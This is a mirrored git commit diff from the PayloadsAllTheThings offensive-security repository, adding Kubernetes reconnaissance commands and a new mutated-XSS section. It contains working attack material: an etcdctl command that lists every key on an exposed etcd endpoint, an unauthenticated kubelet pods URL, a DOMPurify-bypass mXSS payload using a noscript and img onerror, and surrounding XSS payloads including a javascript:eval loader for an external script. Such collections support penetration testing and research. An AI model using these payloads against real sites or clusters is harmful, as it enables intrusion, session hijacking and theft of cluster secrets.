mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
MXSS - Mutated XSS - Google POC
This commit is contained in:
parent
24516ca7a1
commit
6fecedd880
@ -141,6 +141,7 @@ curl -k https://<IP Address>:(8|6)443/api/v1
|
|||||||
```powershell
|
```powershell
|
||||||
curl -k https://<IP address>:2379
|
curl -k https://<IP address>:2379
|
||||||
curl -k https://<IP address>:2379/version
|
curl -k https://<IP address>:2379/version
|
||||||
|
etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
|
||||||
```
|
```
|
||||||
|
|
||||||
### Kubelet API
|
### Kubelet API
|
||||||
@ -155,6 +156,7 @@ curl -k https://<IP address>:10250/pods
|
|||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
curl -k https://<IP Address>:10255
|
curl -k https://<IP Address>:10255
|
||||||
|
http://<external-IP>:10255/pods
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
@ -18,6 +18,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
|
|||||||
- [XSS Hunter](#xss-hunter)
|
- [XSS Hunter](#xss-hunter)
|
||||||
- [Other Blind XSS tools](#other-blind-xss-tools)
|
- [Other Blind XSS tools](#other-blind-xss-tools)
|
||||||
- [Blind XSS endpoint](#blind-xss-endpoint)
|
- [Blind XSS endpoint](#blind-xss-endpoint)
|
||||||
|
- [Mutated XSS](#mutated-xss)
|
||||||
- [Polyglot XSS](#polyglot-xss)
|
- [Polyglot XSS](#polyglot-xss)
|
||||||
- [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
|
- [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
|
||||||
- [Bypass case sensitive](#bypass-case-sensitive)
|
- [Bypass case sensitive](#bypass-case-sensitive)
|
||||||
@ -422,6 +423,15 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
|
|||||||
- Comment Box
|
- Comment Box
|
||||||
- Administrative Panel
|
- Administrative Panel
|
||||||
|
|
||||||
|
## Mutated XSS
|
||||||
|
|
||||||
|
Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`.
|
||||||
|
|
||||||
|
Mutated XSS from Masato Kinugawa, used against DOMPurify component on Google Search. Technical blogposts available at https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/ and https://research.securitum.com/dompurify-bypass-using-mxss/.
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
|
||||||
|
```
|
||||||
|
|
||||||
## Polyglot XSS
|
## Polyglot XSS
|
||||||
|
|
||||||
@ -1055,3 +1065,5 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
|
|||||||
- [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be)
|
- [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be)
|
||||||
- [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html)
|
- [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html)
|
||||||
- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
|
- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
|
||||||
|
- [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
|
||||||
|
- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf)
|
Loading…
Reference in New Issue
Block a user